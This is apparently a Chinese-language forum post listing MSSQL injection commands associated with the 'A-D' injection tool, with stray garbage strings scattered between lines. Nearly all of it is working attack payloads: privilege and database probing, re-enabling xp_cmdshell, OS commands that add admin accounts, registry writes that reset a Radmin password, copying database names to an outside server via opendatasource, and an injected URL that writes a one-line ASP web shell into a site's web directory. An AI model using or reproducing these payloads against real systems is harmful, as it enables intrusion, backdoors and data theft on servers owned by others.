阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
1 u  V& G- B# P  S5 S, ?& {And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
3 V5 U; n4 L" D" m: f( ?9 _
6 J$ j# J- ?8 T//检测是否有读取某数据库的权限
. f6 w  r+ w; ~$ Aand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

" w5 r: y8 `/ }. U# y
数字类型
" F7 F% y1 [, @* U/ ~and char(124)%2Buser%2Bchar(124)=0

6 U0 V' T" D( A4 M' r2 i9 J5 E字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

& h5 [; q5 s( I  R4 }6 H搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

+ Y! m, {5 G% z+ W. M爆用户名
and user>0
' and user>0 and ''='

9 K& M* _- g7 `0 G: D4 P9 j检测是否为SA权限
: ]0 G) N  P8 {7 s% a. p* `. A8 h: jand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
* g  \; d0 Z- J0 {) @& P0 gAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

5 h8 Z3 h  C  i' f7 B% R1 x检测是不是MSSQL数据库
% k( A* l1 m) m/ c$ A" dand exists (select * from sysobjects);--

: z2 ^2 ?# Q, |( r" X0 @* {检测是否支持多行
;declare @d int;--
- i) A# Q% m7 _% R5 C) F
恢复 xp_cmdshell
6 Q7 f+ i( C# h# S- K# b+ e2 u: [;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
! a5 x  T! {6 ?# B6 e
/ L; t  M& e$ c0 M2 `
: e& r/ ]& v1 L2 D, O+ `2 Pselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
. P& b: a$ r7 T: |
//-----------------------
" q# U2 J4 q# o4 A9 F//      执行命令
//-----------------------
首先开启沙盘模式：
. S6 V; h. n- ]' }# jexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
7 T9 }; h, D' r8 }( Z: B9 Qselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
" }* A% I* ~, O4 g. v3 m
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
' v3 S5 f; G7 C4 K, r: O! Lhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
, k% ~" k% F* m; f% c$ }exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 q8 K  c4 S2 i/ K  w& \' N
REG_SZ
2 m, b7 y7 p; S. T  I- C# z4 K
读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
+ j/ n) P9 I8 V+ w* f: z1 I) H
9 _5 p# q& G. Y7 p5 Q' P读取目录内容
* p* u  O5 F* c; V- k4 Fexec master..xp_dirtree 'c:\winnt\system32\',1,1


数据库备份
) g6 F% \! B3 L8 [: e, y( E! lbackup database pubs to disk = 'c:\123.bak'

" }6 H2 G$ D$ P7 y1 F//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
4 ?2 Y! t( N7 Z& V( c/ @
5 E9 T0 _) ^& n+ p

更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'
# l3 C2 s% `! u* n
6 `8 R6 N( b6 }" s添加和删除一个SA权限的用户test：
1 f+ M5 }. l5 Lexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

/ x1 R6 X/ R2 @5 r3 M0 v# `删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
* J9 v' L. U$ D* K' s2 u
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
; [* k& i+ v( Q- t! t) n
1 ?. {- u- z5 W) @9 g
4 h0 A4 C- D! N4 k" J# e5 i停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
7 Z' e/ a% I5 O$ _, t# u5 ^9 Lexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
5 p& S6 b: M2 S6 X8 D
) _3 _8 L. I' p8 [7 e5 C  tdbo.xp_makecab
, _, h0 v- E. u( w6 e
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

+ ^' E4 l: c  _. g- N# \dbo.xp_makecab
- w' I2 q, C4 C'c:\test.cab','mszip',1,
- J, {7 v9 U/ V'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
& @" K8 O" V+ ?
, @! ?9 H' }) p7 K  @5 |3 i4 }xp_terminate_process
( \& T  P$ ]0 C( U! `
4 I8 u% ~9 S8 w, H停掉某个执行中的程序，但赋予的参数是 Process ID。
6 m2 _$ s# s4 U8 Y) `. v3 K: H- l9 s& r8 h利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

/ G  Y$ L( o  j. x' D: H1 y& axp_terminate_process 2484
* b: O+ d- O2 m  e
xp_unpackcab
2 W" }0 {- n+ \# W1 m0 h" i2 O7 L
* ^0 q, V/ k" o: g解开压缩档。
3 D3 z) v/ e2 B1 t, M$ ~8 C
xp_unpackcab 'c:\test.cab','c:\temp',1


, [0 v) q5 u" K3 l: B5 T某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
( r& O& ]% k1 w+ U( Q* i7 PCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
; X. d" N7 u- J
//得到数据库名
% d$ l  x) B8 k& `/ x  hinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


//在Master中创建表，看看权限怎样
" x- @% m- Q! [1 i1 BCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- Y; \  r! O3 [) k. j+ e% Y4 h
: B% O# g" s2 C4 V用 sp_makewebtask直接在web目录里写入一句话马：
. u( d: {: n6 Yhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

, I$ M4 Y# X5 }, g//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

% O: z5 F& C6 }2 M//删除内容
delete from table_name where Stockid = 3